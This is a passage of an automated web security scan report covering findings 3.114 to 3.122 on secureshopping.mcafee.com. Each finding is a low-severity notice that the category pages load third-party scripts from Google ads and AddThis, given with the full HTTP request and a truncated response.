Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:10 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:10 GMT
Content-Length: 56512

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Audio & Video Accessories at McAfee Secure Shopping - Search
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.114. http://secureshopping.mcafee.com/browse/computers/accessories/bags,-cases-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/bags,-cases-covers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/bags,-cases-covers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:12 GMT
Content-Length: 46806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bags, Cases & Covers at McAfee Secure Shopping - Search, Dis
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.115. http://secureshopping.mcafee.com/browse/computers/accessories/batteries-chargers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/batteries-chargers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/batteries-chargers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:12 GMT
Content-Length: 38913

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Batteries & Chargers at McAfee Secure Shopping - Search, Dis
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.116. http://secureshopping.mcafee.com/browse/computers/accessories/camcorder-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camcorder-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/camcorder-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:12 GMT
Content-Length: 52249

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Camcorder Accessories at McAfee Secure Shopping - Search, Discov
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.117. http://secureshopping.mcafee.com/browse/computers/accessories/camera-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camera-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/camera-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:13 GMT
Content-Length: 56160

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Camera Accessories at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.118. http://secureshopping.mcafee.com/browse/computers/accessories/camera-lenses/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/camera-lenses/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/camera-lenses/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:13 GMT
Content-Length: 51849

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Camera Lenses at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.119. http://secureshopping.mcafee.com/browse/computers/accessories/cell-phone-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/cell-phone-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/cell-phone-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:13 GMT
Content-Length: 49397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Cell Phone Accessories at McAfee Secure Shopping - Search, Disco
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.120. http://secureshopping.mcafee.com/browse/computers/accessories/desktop-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/desktop-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/desktop-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:14 GMT
Content-Length: 55784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Desktop Accessories at McAfee Secure Shopping - Search, Discover
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.121. http://secureshopping.mcafee.com/browse/computers/accessories/gps-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/gps-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/gps-accessories/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:15 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:49:15 GMT
Content-Length: 55964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View GPS Accessories at McAfee Secure Shopping - Search, Discover &am
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.122. http://secureshopping.mcafee.com/browse/computers/accessories/headphones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/accessories/headphones/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/computers/accessories/headphones/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
